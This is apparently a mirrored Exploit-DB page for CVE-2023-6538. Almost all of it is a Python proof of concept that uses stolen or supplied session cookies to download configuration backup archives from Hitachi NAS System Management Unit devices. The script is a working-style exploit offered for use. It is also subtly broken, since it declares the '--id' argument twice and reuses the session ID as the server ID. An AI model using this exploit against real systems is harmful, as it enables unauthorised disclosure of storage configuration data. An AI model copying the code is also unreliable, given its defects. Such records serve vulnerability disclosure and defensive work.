HNAS SMU 14.8.7825 – Information Disclosure

• Exploit Database
• 124 阅读

• 作者： Arslan Masood
  日期： 2024-03-20
• 类别：

  • remote
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/51915/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93

  # Exploit Title: Hitachi NAS (HNAS) System Management Unit (SMU) 14.8.7825 - Information Disclosure # CVE:CVE-2023-6538 # Date: 2023-12-13 # Exploit Author: Arslan Masood (@arszilla) # Vendor: https://www.hitachivantara.com/ # Version:< 14.8.7825.01 # Tested On:13.9.7021.04   import argparse from os import getcwd   import requests   parser = argparse.ArgumentParser( description="CVE-2023-6538 PoC", usage="./CVE-2023-6538.py --host <Hostname/FQDN/IP> --id <JSESSIONID> --sso <JSESSIONIDSSO>" )   # Create --host argument: parser.add_argument( "--host", required=True, type=str, help="Hostname/FQDN/IP Address. Provide the port, if necessary, i.e. 127.0.0.1:8443, example.com:8443" )   # Create --id argument: parser.add_argument( "--id", required=True, type=str, help="JSESSIONID cookie value" )   # Create --sso argument: parser.add_argument( "--sso", required=True, type=str, help="JSESSIONIDSSO cookie value" )   # Create --id argument: parser.add_argument( "--id", required=True, type=str, help="Server ID value" )   args = parser.parse_args()   def download_file(hostname, jsessionid, jsessionidsso, serverid): # Set the filename: filename = "registry_data.tgz"   # Vulnerable SMU URL: smu_url = f"https://{hostname}/mgr/app/template/simple%2CDownloadConfigScreen.vm?serverid={serverid}"   # GET request cookies smu_cookies = { "JSESSIONID": jsessionid, "JSESSIONIDSSO":jsessionidsso }   # GET request headers: smu_headers = { "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language":"en-US,en;q=0.5", "Accept-Encoding":"gzip, deflate", "Dnt":"1", "Referer":f"https://{hostname}/mgr/app/action/serveradmin.ConfigRestoreAction/eventsubmit_doperform/ignored", "Upgrade-Insecure-Requests":"1", "Sec-Fetch-Dest": "document", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-User": "?1", "Te": "trailers", "Connection": "close" }   # Send the request: with requests.get(smu_url, headers=smu_headers, cookies=smu_cookies, stream=True, verify=False) as file_download: with open(filename, &apos;wb&apos;) as backup_archive: # Write the zip file to the CWD: backup_archive.write(file_download.content)   print(f"{filename} has been downloaded to {getcwd()}")   if __name__ == "__main__": download_file(args.host, args.id, args.sso, args.id)